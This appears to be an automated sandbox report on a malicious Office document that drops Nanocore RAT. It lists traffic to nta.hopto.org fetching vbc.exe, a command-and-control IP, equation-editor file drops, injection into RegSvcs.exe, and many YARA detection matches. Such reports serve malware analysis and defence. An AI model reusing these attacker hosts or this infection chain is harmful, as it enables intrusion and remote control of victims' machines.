2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a

Source: Joe Sandbox View	IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View	IP Address: 79.134.225.26 79.134.225.26

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /reg/v.dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: nta.hopto.org
Source: global traffic	HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nta.hopto.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4CB73-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /reg/v.dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: nta.hopto.org
Source: global traffic	HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nta.hopto.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: reg on nta.hopto.org.url.0.dr	String found in binary or memory: http://nta.hopto.org/reg/
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: dbzEXdF.url.0.dr	String found in binary or memory: https://cutt.ly/dbzEXdF
Source: vbc.exe	String found in binary or memory: https://github.com/unguest
Source: vbc.exe.4.dr	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443

Source: unknown

HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: RegSvcs.exe, 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match	File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.3824d52.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.8a0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.3830f84.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.5a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.5b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2280000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.760000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.780000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.5b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.26f171c.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.26f171c.20.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.2280000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2250000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.780000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.890000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.910000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.8a0000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.26f6574.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2254c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.910000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.5a0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.770000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.890000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2250000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.225e8a4.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27027b4.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.27027b4.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27027b4.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.26f6574.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.26f6574.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D114A NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D110F NtQuerySystemInformation,

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F7489
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F5160
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F39A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F3198
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F262A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F42B1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F7038
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003FBC68
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F7048
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003FB5C8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F5E58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003FBA50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F6E50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F5E48
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F6E40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F7298
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F7288
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F42C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003F6B19
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00470BB8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_00393020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_00392418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003938C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_00399D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_00399120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_0039EA80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_0039C3E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_0039B7E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_0039C4A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003930E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_00399DE7

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34

Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
